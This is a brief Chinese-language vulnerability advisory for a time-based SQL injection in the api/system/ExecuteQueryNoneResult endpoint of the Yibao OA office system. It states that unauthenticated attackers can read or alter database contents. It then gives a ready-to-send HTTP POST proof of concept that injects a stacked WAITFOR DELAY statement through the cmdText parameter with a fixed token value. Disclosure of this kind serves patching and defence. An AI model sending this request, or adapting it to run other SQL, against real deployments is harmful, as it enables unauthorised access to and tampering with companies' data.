漏洞描述
易宝OA是一款广泛应用于企业管理的办公自动化系统,提供高效的工作流管理和数据处理功能。在 api/system/ExecuteQueryNoneResult 接口中存在SQL时间注入漏洞,攻击者可以通过构造恶意的SQL语句,未经授权地访问或操作数据库中的敏感数据,可能导致数据泄露或篡改。
易宝OA api/system/ExecuteQueryNoneResult SQL 注入漏洞
PoC代码
POST /api/system/ExecuteQueryNoneResult HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
token=zxh&cmdText=;WAITFOR DELAY '0:0:0'--